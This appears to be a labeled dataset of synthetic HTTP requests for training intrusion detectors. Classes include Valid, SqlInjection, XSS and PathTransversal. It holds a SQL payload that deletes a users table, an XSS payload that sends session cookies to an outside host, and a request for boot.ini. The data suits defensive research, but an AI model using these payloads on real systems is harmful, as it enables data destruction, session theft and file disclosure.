~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27441
Start - Id: 7622
class: Valid
POST /cOdctu6BH3pT/p1cnirwo/t6QSSY/ioec6.jpeg? HTTP/1.1
Content-Length: 287
Content-Language: dnxuhon
Content-Encoding: identity
Content-Location: http://www.hc8foof.de/ilue/lodecelb/aeniE/ci1Tsn.pdf
Content-MD5: cG9UaGFvYWxvY2tmcmxiZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 15 Mar 05 05:53:15 UTC
Last-Modified: Thu, 17 Mar 05 05:58:21 UTC
Host: www.ggsnss.uk:80
Connection: keep-alive
Accept: */*
Accept-Charset: utf-8, cp-932, utf-7;q=0.6, iso-8859-6, x-mac-chinesetrad
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 136.161.142.168
Cookie: lcxBV0IgallfY9=aOV_K;aWsteonmuEs=i6Bhs6Tdti;stnoa2rrea=b?ilEedhcbW;DRDasystemwdSA=ohidtmle$9ateoa2x;s8o6hiwqads9=onpmrcppt
Cookie2: $Version="506"
Date: Mon, 06 Mar 06 20:16:41 UTC
ETag: "qi2unb4DKTAP9F9lw"
Expect: 100-continue
From: Uam4ikh@nCececii2a.uk
If-Modified-Since: Mon, 28 May 07 12:49:50 CET
If-Unmodified-Since: Mon, 26 Jan 09 15:18:19 UTC
If-Match: *
If-None-Match: "vfy9-T2FiKdyyGTCwj"
If-Range: Tue, 23 Mar 10 12:56:04 UTC
Max-Forwards: 021
MIME-Version: 5.9
Pragma: tle=auiaii
Proxy-Authorization: Basic UzluZWhtbjp0dWxnbg==
Authorization: NTLM YUFmZGVvaGo4NmxYRWpwbGZsZHVHdXdldEl0c3JlcW9z
Range: 589350-528199,5255-4
Referer: /2eeMdn/Eanort/kwiotn/xmIji.gz
TE: trailers
Trailer: If-Modified-Since
User-Agent: hd8L72u/8.6.3.5.3
UA-CPU: 68000
UA-OS: Windows NT
UA-Color: color32
Via: 7.2 www.en3e.gif:7965
Transfer-Encoding: deflate
Upgrade: yyr85/0.6, mnLmta/7.1, sedrw/1.7, wRp3/3.2, ebe/4.8
X-Forwarded-For: 223.150.236.173
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

2uQ0opt1IdwdRD=8472023450&nrr=ixiI@cb&deszmSfto3R=oindaO&t1ia7=uiip-emanmgotha&eo4er=hHBB61zRZRzj&Ishmc4=pbinU3Br]sEHstyle8&_VYD@28Nbf-=od&IoDrtlheeAd=i;n'&eUl=yvchild  havingTn'-0&Qdzhz8wnCtu=ke04envZiAhe6c8nta&ni2fhvort=e3&5esqa5e79yWe3=5+ytr3mleo0dnyusN0&ywAtpehggis=88010

End - Id: 7622
Start - Id: 41473
class: SqlInjection
POST /SV/Ae6teeo6teruDotsf/iaaGbajd.asp? HTTP/1.0
Content-Length: 117
Content-Language: iwu0rah
Content-Encoding: identity
Content-Location: http://athi.cz/rnpdsbg/oyu4/ogrr.mspx
Content-MD5: dHJhemJlNm9hU2FqaGptdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 10 Jan 10 11:19:35 UTC
Last-Modified: Sun, 06 Apr 08 16:19:11 GMT
Host: 20.165.58.235
Connection: keep-alive
Accept: text/xml;q=0.0, video/mpeg
Accept-Charset: *;q=0.4
Accept-Encoding: compress;q=0.5, identity, gzip;q=0.4
Accept-Language: iz-6hj3ytEh, sthe-b5ijbo;q=0.5
Cache-Control: 2wafb6ei='aa88eFog'
Client-ip: 33.190.206.236
Cookie: layj=0661907274;ooxthe=1803576;tai=Hdariy6;euee=85218566
Cookie2: $Version="4"
Date: Sat, 30 Aug 08 23:16:31 GMT
ETag: W/"fXwEEo9cRQPW3zV"
Expect: nvcrmt2
From: t0cih@nlhtfemb7.st
If-Modified-Since: Tue, 30 Oct 07 07:28:55 UTC
If-Unmodified-Since: Sun, 13 Jul 08 17:43:47 UTC
If-Match: "wbslCcTvXnpxgPY4b"
If-None-Match: "q62g2dt3wft4Rwpc"
If-Range: *
Max-Forwards: 7
MIME-Version: 4.5
Pragma: ne=taavEa
Proxy-Authorization: Basic NkJjbTphZ3JsMmp3ZQ==
Authorization: Digest uri=/itEeiytn/o9eohet/gmrs/sfod/42T2.mpg
Range: 78-403185
Referer: /6iRbmfu/e7gCnNd/sleo/rsiCs.msf
TE: gzip,deflate
Trailer: Accept-Encoding
User-Agent: ar9qaerlad (a3E86K; odWPhv7; 9RgZDaH; tHvP4O; rlMCPPAn)
UA-CPU: MIPS
UA-Disp: 338,3350,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 054x8213
Via: 2.2 www.iihes.htm, 5.5 27.3.254.63, 3.7 www.abnpo.css:5859
Transfer-Encoding: identity
Upgrade: duea/0.0
Warning: 013 130.95.230.195 "uusnotnttoteatpfbu1" "Tue, 08 Nov 05 20:23:16 GMT"
X-Forwarded-For: 37.28.59.187
X-Serial-Number: 40748942
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~

tsrhcq4a=24678&ep0isialihho='   );     delete     from  users;    commit;  dummy(  '&eefmadmgR=13903065

End - Id: 41473
Start - Id: 6857
class: Valid
POST /glike6Pb/su.AiyJO/r1PcPta.Cc/MwhH6sq@@1IaD/gdDp.zPgXO/kFYV@YO_Db298z/U2cworj/wEvF0LkN_IcocT-yx8/humfKAymoZycOr.9sEp/avrHHW-oSfRj7KnBw-.msf? HTTP/1.0
Content-Length: 240
Content-Language: aotoct
Content-Encoding: identity
Content-Location: http://umxi.de/oSh3l0/taac.mdb
Content-MD5: aGhubmRoaHJMaXQ4ckFOZw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 29 Mar 08 11:23:11 UTC
Last-Modified: Thu, 14 Oct 04 20:37:17 UTC
Host: 99.27.115.237
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Oyn-k9;q=0.8, 5-itTny
Cache-Control: no-transform
Client-ip: 193.120.93.85
Cookie: eno54htz=20399;e72daer=smLUuJ;4e1ohl=tVU3;qscsqnao=hs;aah4r=z0n~Trmsd
Cookie2: $Version="0"
Date: Wed, 02 Jul 08 16:23:55 UTC
ETag: "kQvnRfhrblqQZ4QKdPsU"
Expect: 100-continue
From: 1m1ll@ibidpns.org
If-Modified-Since: Sun, 22 Oct 06 09:36:06 UTC
If-Unmodified-Since: Fri, 21 Sep 07 11:05:14 CET
If-Match: *
If-None-Match: "b243uD0kedq8dk4vkII"
If-Range: Sun, 25 Jul 04 23:51:53 GMT
Max-Forwards: 83
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Basic YWhhZXI2OmFvaGg=
Range: -846354,921-70
Referer: http://www.oaseniah.st/kxoadl9y/eiwte/wEiiqnhe/gvdt/reoei.php
TE: trailers,chunked
Trailer: If-Modified-Since
User-Agent: sym2 (sWMUTZSFpb)
UA-CPU: Sparc
UA-Disp: 1729,430,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 6239x610
Via: 4.0 www.oo9jwsu.jpg
Transfer-Encoding: deflate
Upgrade: wJoe/9.4, csik/4.7, njsNtm/6.0
Warning: 129 www.9lvodtr.jpeg "nTtwlNvsm" "Wed, 13 Dec 06 13:48:45 UTC"
X-Forwarded-For: 225.78.188.108
X-Serial-Number: 363755814823651
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

erclt=16140&OOlzvatsreryg=0rrtespol33xOa&8yatfdehrwit=38&matieeokeNnrlp=437506&ce1Dsndt=iftpd:\ar&sSGsniyMxo=0vWEpuWQcwJ&oealIlvo=7ejbtftpes nn2nn&wft1ongoE=ag_YRzeNK6&teuery2ma=ki2r&Icycoc=6710566&Z6JR30ZnD.p0=Cgtw&hjloRts2e6nd=lonojes

End - Id: 6857
Start - Id: 47670
class: XSS
GET /c71Vg/9v9QQA8LPFKj8yH/oUkj@Qxow47kTVm6-/bpV00Xz@O/syKDU/rrPZ/nGxzjI4JF1R1COYhIC7/csq2sirxh.exe?sesunsejciur=e8sqhx%27%3C&uaTt6m=4941584&6s0tgens=Jwp-sgcetLtftst&IseEwqix1sevn=UERrtso2eumm&tiienwrIi4a=%3Ca+href%3D%22++++javas%26%2399%3Bript%26%2335%3B%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.isveal.com%2Fcgi-bin%2Feninnt.cgi%27%2Bdocument.cookie%29%3B%5D++++%22++++%3E HTTP/1.1
Host: www.etoB8fa.st:80
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 39.154.184.38
Cookie: obf=tlRwatt1ag;ziteA=1196;Ia=59565;xcrt9v=cy;eg9cc=35792
Cookie2: $Version="8"
Date: Mon, 12 Apr 04 14:24:45 UTC
ETag: W/"z_T1tK75-Wf.Z._"
Expect: 6dleoav=hnlO
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Wed, 08 Mar 06 21:44:58 UTC
If-Unmodified-Since: Tue, 13 Dec 05 10:07:15 UTC
If-Match: "i4QRCYzzyN2UmI5luK8"
If-None-Match: *
If-Range: "l_ORPJKEZn2GZH8S"
Max-Forwards: 2291
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: lsrc Ezipm=8oubz
Range: -017,-1,-32
Referer: http://www.srnnaxne.uk/hgslzfe/a90peejE.mdb
TE: trailers,chunked
Trailer: From
User-Agent: aotSlr/8.1.1.7
UA-CPU: 68000
UA-Disp: 2630,1668,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 934x7117
Via: zoes/3.0 235.135.82.75
Transfer-Encoding: compress
Upgrade: OceeiE/8.8, btin/1.3, wrUw/4.8, toehd/0.2, t0m4l/5.1
Warning: 558 194.108.196.44 "letduvqanrqo" 
X-Forwarded-For: 118.255.6.210
X-Serial-Number: 6943669939
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 47670
Start - Id: 1104
class: Valid
GET /nsEpsjMW-p8lC88/eEvyb/rsihyRtg3lolcairDs/vQDM9_0oVAMap/N0M/hn9RpdG4V9ItLZUQz2/aUJi0sj_OJvc/sKG/sM7nT0lERWaMtK0Ma.mspx? HTTP/1.1
Host: 59.161.161.1
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.4
Accept-Language: lasuvvcr-tdt, ks95oto-fiiihptp;q=0.8, h-lhdk
Cache-Control: max-age=1
Client-ip: 249.26.84.16
Cookie: ia3iih7heg1oD=a.NEQZqi;tEmte=590;lxs=986
Cookie2: $Version="48"
Date: Tue, 13 Sep 05 21:40:16 UTC
ETag: W/"CLMnrtpnGcA_ZQp"
Expect: 100-continue
From: hsrtboi@onni.cz
If-Modified-Since: Sun, 22 Nov 09 09:35:47 GMT
If-Unmodified-Since: Wed, 19 Sep 07 18:45:22 UTC
If-Match: "aDcV4HzyhcFyo9g1"
If-None-Match: "2rF-p_JGO5oas.sKpa"
If-Range: *
Max-Forwards: 42
MIME-Version: 9.6
Pragma: aee49rz='xauenel'
Proxy-Authorization: NTLM c3RlY1JudGlvYmVpdGVhcWVkaUVkdHRobnJxZGVtcnRiaW5jaDJkTG90Mg==
Authorization: Basic aXNldHhuanM6bDBoMXNmdQ==
Range: 634551-,48052-6687,-9
Referer: http://www.sefesaaf.cz/hohe.html
TE: trailers,gzip;q=0.4,trailers
Trailer: If-Modified-Since
User-Agent: rdiEy/9.4.5
UA-CPU: 68000
UA-Disp: 4228,5087,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 8837x3320
Via: 0.8 www.arowo.htm, 2.9 www.dume.js, 9.4 www.trp9esd.shtml
Transfer-Encoding: deflate
Upgrade: naoiE7/1.4, Zee1m6/8.6, 40Hci1/1.3, 6iCotl/8.9
Warning: 392 www.m2hZnz.tiff "idliSa9nioaswwetlp" "Thu, 02 Sep 04 23:56:20 CET"
X-Forwarded-For: 202.230.15.64
X-Serial-Number: 627934
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1104
Start - Id: 26402
class: Valid
GET /abZ-Km..Otcp4/etmiwoLoeegLsohztum/t4/e0ikhxmlcljTebLcee/Av/nbB3ajxall.h@wget5/oel4lVylN.mspx? HTTP/1.0
Host: 189.120.116.20
Connection: cE80s
Accept: */*
Accept-Charset: x-mac-ce, iso-8859-1;q=0.6, isiri-3342;q=0.1, x-mac-chinesetrad;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 195.72.172.233
Cookie: dfo=9includeselectenOd aotmphp;atcabeuaywib=eOnlUn;Ga8b6piocae=sa8dvKvyGeM
Cookie2: $Version="9"
Date: Sun, 04 Jan 04 08:27:44 UTC
ETag: W/"iukEqil6aiSniXn9svGx"
Expect: 100-continue
From: aR5eoW@aIpYiyate.org
If-Modified-Since: Tue, 31 Oct 06 02:19:20 GMT
If-Unmodified-Since: Sun, 19 Feb 06 15:03:04 UTC
If-Match: "@N3zn2RrfIt1ddL-E"
If-None-Match: "MA1P6jjk0H5RsePCFt3d"
If-Range: "9T9ULjvohvv.hIO"
Max-Forwards: 5724
MIME-Version: 8.7
Pragma: 5vmraj='wv'
Proxy-Authorization: NTLM dTRjYWl0dG1zZGVzbm5pbmRhYnNpZ2NlZWVnb2RNbmRudTU4c29uRXRnZQ==
Authorization: jae3oa eanBe=shu5ec
Range: 828-31900
Referer: /ncaiit/ggeto5oo/5zNelccu/o0hoBlat.php3
TE: deflate,trailers,deflate;q=0.5
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.4 (compatible; lftrde; Win98; hcaoptua; 1tea)
UA-CPU: StrongARM
UA-Disp: 146,5965,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4505x535
Via: 4.8 6.252.39.142
Transfer-Encoding: deflate
Upgrade: eias4/8.2, 0it/9.6, nutr/1.8
Warning: 537 76.89.152.125 "oqet1tn44temca" "Mon, 16 Jan 06 20:27:08 UTC"
X-Forwarded-For: 59.157.184.124
X-Serial-Number: 7631325909856
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26402
Start - Id: 22574
class: Valid
GET /KHcjRCX1jnetcatexecus/d7OxIniooj22a/GmELxinnMrcpydeleteK/5iNmhlonEr3xFle/cCD9rFyfvl.aspx? HTTP/1.1
Host: www.ncaghr.st:80
Connection: keep-alive
Accept: image/jpeg;q=0.3, video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 14.142.132.191
Cookie: ipesie=55967407
Cookie2: $Version="51"
Date: Thu, 20 Aug 09 21:33:04 UTC
ETag: W/"XAsOYXqELAWcTGvV"
Expect: icoztpd
From: tetoseli@i9ihet.it
If-Modified-Since: Sat, 20 May 06 11:40:39 CET
If-Unmodified-Since: Sun, 24 Oct 04 11:54:35 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 17 Oct 07 04:33:52 CET
Max-Forwards: 513
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: NTLM dGhkZkJhc241Z2RlRXF6YWl4bGFobGFzOGhhcnJPYXR4dG90aGllbmhzcGdz
Authorization: NTLM blNlSGFoMGJlc1NvaHRlc2NibHk0cmhvdG55eWllRWFw
Range: 008-622747,-490549,85-794080
Referer: http://www.tret5eil.uk/udLibt/ybejs.mp3
TE: trailers,trailers,trailers
Trailer: Accept-Charset
User-Agent: heelse (oBfn_5T)
UA-CPU: Sparc
UA-Disp: 5896,055,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3119x0399
Via: HTTP/5.6 www.aiToteol.css:4091, seO/4.3 27.8.222.2, FTP/5.4 138.99.221.137
Transfer-Encoding: compress
Upgrade: 8Axhe/0.4, wsuiec/8.3, eoch/3.1, jxkrm/9.3
Warning: 801 www.tnclaoit.jpg "crNhnstf" "Mon, 23 Mar 09 09:36:08 GMT"
X-Forwarded-For: 227.174.126.186
X-Serial-Number: 85960080246851
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22574
Start - Id: 24383
class: Valid
GET /e9bR6E0iy-TWlIyw/sTb4G3liIG/hGv7j/gJPm-LToy1MCFk/yetoujha/sock_stream1o3DpQ/yzLzY8En.asmx?6X@_szVguz_X=mR4wHzKpoxkl&sJVAFhomeG541=2393631621&e4tasthsb9adRus=le&AwuhDn=91899 HTTP/1.1
Host: www.arTA.fr:33
Connection: txVatI5o
Accept: */*;q=0.6
Accept-Charset: x-mac-chinesesimp, x-mac-cyrillic, windows-1254
Accept-Encoding: gzip, gzip;q=0.3, identity
Accept-Language: eeo-r, oiS1iatl-pi;q=0.5, retc-ei
Cache-Control: max-age=23141
Client-ip: 248.165.100.251
Cookie: mwnnl7tAaee6a=~ci8s\oteawer;tntox5i=l0telnet67;vttpLsrLx=aG_quwO
Cookie2: $Version="518"
Date: Sat, 21 Jan 06 02:06:12 GMT
ETag: "9dciFh3KeV@7.KxaU4"
Expect: 100-continue
From: Tieh@ettdu.fr
If-Modified-Since: Mon, 04 Sep 06 18:55:48 CET
If-Unmodified-Since: Sat, 14 Feb 04 08:01:21 CET
If-Match: "brabzzwy6Neay-@347"
If-None-Match: *
If-Range: "dhyrSw@JO-SKpewBNl"
Max-Forwards: 933
MIME-Version: 3.6
Pragma: ee=7hle
Proxy-Authorization: NTLM ZGE5ZWVjbGVjaW1vb2VuYnRoaWV0c3J1YWgxb2h0MWxkc2hpMG9nbHN0cA==
Authorization: NTLM cnJvb2loaHE3bm9JZWdlcXdyMmE1b2FsTGxwZWNjMGh0ZW94
Range: 18-
Referer: http://922G.be/eitnlDix/alsHbsct.gz
TE: gzip
Trailer: Accept-Charset
User-Agent: speercudsP
UA-CPU: 68000
UA-Disp: 801,8735,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 1274x3966
Via: u8h/5.8 221.240.34.116, FTP/2.4 187.179.21.91:825
Transfer-Encoding: identity
Upgrade: ya9/0.7
Warning: 583 www.digi.js "ep3nn0retlwyt" "Wed, 24 Dec 08 19:28:30 CET"
X-Forwarded-For: 231.128.57.40
X-Serial-Number: 2633787147170718759
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 24383
Start - Id: 1565
class: Valid
GET /ctdiedHdetrao/t1e9jL.Wyn8lu46/Gx1http_fXLBOXK/BM@.AbD1Z7-Yli/ezt4Wp_52qpY2V2gA/r3gdgQXF/pqMTFd/gVA5A_HLGgMP.GsBD/sNmVYo3pxWp/LajAc1/jXHexo@Kh3DE-ql.aspx?oleetstn=80&D-NDaQg=tncray+%24oa1y8&nu7a29ieo2vo3o=%3F HTTP/1.0
Host: 59.197.233.156
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: i3etiwhc-iBgEts8n, h75ats-a7etieTa;q=0.3, 7crntemx-Enaattw
Cache-Control: max-age=79621
Client-ip: 229.141.60.162
Cookie: ci=MnIknaic;M2wnI=&Bsen7;annpnhye2n3=091;fluhn=2sOY_QpAL;oe=euiframeTqincludeanaareplace cCaccess_log;fntdoseothyeny=uee5s
Cookie2: $Version="49"
Date: Tue, 21 Jul 09 12:03:47 UTC
ETag: W/"TcNTBE.hnvT-fkK"
Expect: uumaob=nye0d
From: tyoranj@tial.uk
If-Modified-Since: Fri, 03 Aug 07 13:37:46 CET
If-Unmodified-Since: Fri, 25 Jan 08 10:17:35 CET
If-Match: "eFzV2rRSGRFQUCW"
If-None-Match: *
If-Range: "Wvd95.lJNCecu2hKSro"
Max-Forwards: 4461
MIME-Version: 0.0
Pragma: Geud='5s4a'
Proxy-Authorization: Basic OGRhc3J0Y3Q6UmVlVHk=
Authorization: ssdm olbrhazl=e7attr
Range: -7,52718-,3057-736702
Referer: /o4fsasaS/5Oreatt/eiztsnr.conf
TE: trailers,chunked;q=0.2
Trailer: Authorization
User-Agent: Mozilla/6.3 (X11; U; Solaris 1.1; Pu-Rt; rv:8.0.7) Gecko/32180376
UA-CPU: StrongARM
UA-Disp: 048,2159,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7934x8697
Via: 2.6 124.191.224.34, HTTP/7.3 179.165.241.161:8, FTP/1.1 www.ypoupaee.tiff
Transfer-Encoding: gzip
Upgrade: tbn/9.6, 9ao/1.1
Warning: 565 www.oaie5.css "3h4i3dbeiaed6iodoqtr" "Thu, 25 Dec 08 10:23:34 CET"
X-Forwarded-For: 36.197.187.144
X-Serial-Number: 4623775518466698
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1565
Start - Id: 1088
class: Valid
GET /Fc0nE6gLhNQPV@.asp?7h2snaocxtonote=shfmRnSZv&onmkheD=tjin&ewddt97=eut%3A&tOae7iaeieoheew=mot&@fW.ajBc9V=5&enm=2 HTTP/1.1
Host: 103.191.180.84:3
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-2;q=0.1, big5
Accept-Encoding: 
Accept-Language: niMiiw-egir, ajhseeT-NdAe9ei;q=0.2
Cache-Control: max-age=2
Client-ip: 167.66.177.89
Cookie: sInt9moeRr0=eneysyh;7s7aehtoRkku6t=57437737;tntlnzsp8trRae8=iCCnaset2r5swe;opione=ypwherehwinntwperpasswdunionteih;nrn2sebtwI=rpdoIetnidhi
Cookie2: $Version="356"
Date: Sun, 17 Aug 08 16:17:17 UTC
ETag: W/"24OIKzR5Cws.cTjN"
Expect: 100-continue
From: hsrtboi@onni.cz
If-Modified-Since: Thu, 20 May 04 19:49:03 UTC
If-Unmodified-Since: Tue, 29 Mar 05 23:19:18 GMT
If-Match: *
If-None-Match: "unhfcInXIh@eYH2F"
If-Range: "twttdXPLDQmQ.iFK9-"
Max-Forwards: 393
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: NTLM b3N4Z2dodHNhcnl5ZWhmcmZvMWd5cnhybm50ZmhyYWVlYm5hN3RvdG5jcw==
Authorization: Digest cnonce="hhireofc"
Range: 665885-,-6
Referer: http://www.iTmoeog.it/ru7oap/eTtmnnln/hgNinm3b/WipuMyp/1sdc.jpg
TE: deflate
Trailer: If-Modified-Since
User-Agent: eo9Jkuwj http://www.tHo3rd.cz
UA-CPU: StrongARM
UA-Disp: 465,0552,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 8837x3320
Via: HTTP/5.8 33.239.131.97, HTTP/8.9 232.66.23.86, 0.5 www.uxniBeYH.png
Transfer-Encoding: compress
Upgrade: n3ex/4.8
Warning: 222 www.aosWke.js "i9rrOt4h" 
X-Forwarded-For: 161.112.181.42
X-Serial-Number: 0153270
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1088
Start - Id: 8222
class: Valid
GET /b0je5Hle5ntNavstp/t9utkbasT/bjg9HwB.qE7Imw_O2h/acheni/pVpH6F3XJUFzx/ze/grmhNlhrt.gif?Drh=fxuqry&ohxpbriiSi8ft=295&0e8nds2=dIc_XVdvG&TrlufIjrraeinl=iT%402h+ucns2ixmld&teo=shysos&tpniosorios=mq%3A0meiiframewofimg&uHutccsu7dr=srcpnkd%2F%2FuniondiframedTl&l5nxw=3559&81=571 HTTP/1.0
Host: www.rYsro.ch:3431
Connection: A98qndet
Accept: video/mpeg;q=0.6, audio/*;q=0.9, application/postscript
Accept-Charset: windows-1253, cp-936;q=0.5, euc-kr;q=0.1, euc-tw;q=0.4
Accept-Encoding: gzip;q=0.3
Accept-Language: *
Cache-Control: max-age=644
Client-ip: 4.97.133.201
Cookie: ttfoshlteqeufa=-httpso~b
Cookie2: $Version="869"
Date: Wed, 23 Nov 05 18:32:34 UTC
ETag: W/"6Yal4L@TVxr.WUoqs"
Expect: und1
From: naraez2@nbaeit.cz
If-Modified-Since: Fri, 04 Mar 05 07:37:54 CET
If-Unmodified-Since: Sat, 31 Mar 07 08:06:40 CET
If-Match: *
If-None-Match: "GHqEM_WeJcGwy4OqZQF"
If-Range: *
Max-Forwards: 9609
MIME-Version: 1.5
Pragma: ewagno=bhrehA
Proxy-Authorization: Basic dWVjaGFvOjBpeWFl
Authorization: Basic bm5lMjpob3JhZQ==
Range: -164292,-5
Referer: http://gistt.fr/ceAmeumu.gif
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Uhsr5tnda/5.5.6.9
UA-CPU: Sparc
UA-Disp: 260,910,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 4023x6297
Via: 1.1 www.rhedto.jpg
Transfer-Encoding: compress
Upgrade: ib6Ex/5.7, aZse/0.7
Warning: 252 www.aUro.css "eearwsr7" 
X-Forwarded-For: 176.93.53.162
X-Serial-Number: 9806136470509307613
----: --------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 8222
Start - Id: 45900
class: PathTransversal
GET /cl.cgi?eoDo=y%3A%5Cwinnt%5Cboot.ini HTTP/1.0
Host: 8.69.51.6
Connection: keep-alive
Accept: video/*
Accept-Charset: windows-1253, windows-1257, hz-gb-2312;q=0.7, hz-gb-2312
Accept-Encoding: 
Accept-Language: EEi-HhanLe, 5xadig-xn, cet74so-rU;q=0.5
Cache-Control: max-age=4035
Client-ip: 150.120.252.37
Cookie: atsdtsoybenb=sqoeonjsehe
Cookie2: $Version="32"
Date: Wed, 06 Feb 08 22:30:58 CET
ETag: "I5Zacwl6TPqEQ2Zm"
Expect: 100-continue
From: sdns@tal3sea.gov
If-Modified-Since: Wed, 04 Feb 09 12:20:28 UTC
If-Unmodified-Since: Mon, 08 Mar 10 07:13:44 UTC
If-Match: "i6ctgOuQxlD2XJs"
If-None-Match: "9ibFJQtfd7.v6Zo6.vS5"
If-Range: Sat, 05 Nov 05 03:25:14 GMT
Max-Forwards: 2
MIME-Version: 4.5
Pragma: hrna4=iqt7
Proxy-Authorization: omjasV v1Eoao=notim
Authorization: Digest nc=3A514cE2
Range: 58-182597,4-9
Referer: http://www.eIei.be/at1hdeeo/17je/tqsbmO/wsu9n0.pl
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/4.7 (compatible; Konqueror/9.5; Windows NT; oaiah)
UA-CPU: StrongARM
UA-Disp: 567,3273,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1031x814
Via: HTTP/4.2 www.uibro6G9.jpg, FTP/0.4 249.196.187.10
Transfer-Encoding: compress
Upgrade: esaee/2.2, iau/2.7, hrA1n/8.8, eet/8.3, 3umqCt/3.7
Warning: 059 www.ksairqwg.js:39883 "donee6dnsowllcjs" "Sat, 22 Jan 05 11:00:58 CET"
X-Forwarded-For: 30.193.214.158
X-Serial-Number: 447963296121692
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45900
Start - Id: 5589
class: Valid
PUT /iiD.8/tzrQwfMvwN5YHYPb/vsVdA/EfXixml/rtn0Qioainloo8tlss/riatgnnrRazfPdou1ote/nshwTg80K4/uor5qsmkyCfnrah/ilt8TeSsciigom/byaaasOcoermerpr.jpeg? HTTP/1.0
Content-Length: 90
Content-Language: e3inn0,l,Qhdi
Content-Encoding: gzip
Content-Location: /gxdR/ut0tvrt/23ll/ctafp/E5lilmeR.php
Content-MD5: ZXRwZGFvdHRzbGVmaWUzZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 08 Oct 07 16:35:36 GMT
Last-Modified: Thu, 12 Feb 09 19:58:19 UTC
Host: 170.14.214.202
Connection: keep-alive
Accept: video/mpeg, text/plain;q=0.4, video/quicktime
Accept-Charset: x-mac-turkish, windows-1251, cp-936, iso-8859-4;q=0.9, windows-1251
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 120.107.44.213
Cookie: aytont4uyruaep=Msqvotpet9
Cookie2: $Version="81"
Date: Wed, 13 Jun 07 20:08:39 CET
ETag: W/"yf8v3S-hPt7MNYXsQGs2"
Expect: 100-continue
From: lsbetkih@rdl7oi5.fr
If-Modified-Since: Fri, 16 Mar 07 12:44:47 GMT
If-Unmodified-Since: Fri, 01 Jul 05 19:45:38 GMT
If-Match: *
If-None-Match: *
If-Range: "1P5zmMUTNRy9bHSY"
Max-Forwards: 6
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: c9oqp 5lei=rnNhes
Authorization: NTLM eHRlZXQ0d2NyeGFjMnVTanRldG5lcmo4dHJscmVnaGpFdWlhbWNpNXM=
Range: 673-
Referer: /riem/hlns.pdf
TE: trailers,chunked
Trailer: If-Modified-Since
User-Agent: ap5L5B@_In http://www.2TEtobot.gov
UA-CPU: x86
UA-Disp: 972,439,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0202x3743
Via: FTP/3.6 214.126.111.44
Transfer-Encoding: gzip
Upgrade: 0gdai/9.0, eup9/9.9, osahep/0.7, ihgie/4.7
Warning: 189 www.tsXitt6.gif "8U5tatshea" 
X-Forwarded-For: 180.152.86.133
X-Serial-Number: 07654558799930280172
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

r-U-mRvgh8=6&tndhp3efene2=sy5vciYs7dsThf&htoh=UOe&wcs=82546&4erePzog=5VBuBOo&Soosdphirn=oe

End - Id: 5589
Start - Id: 2241
class: Valid
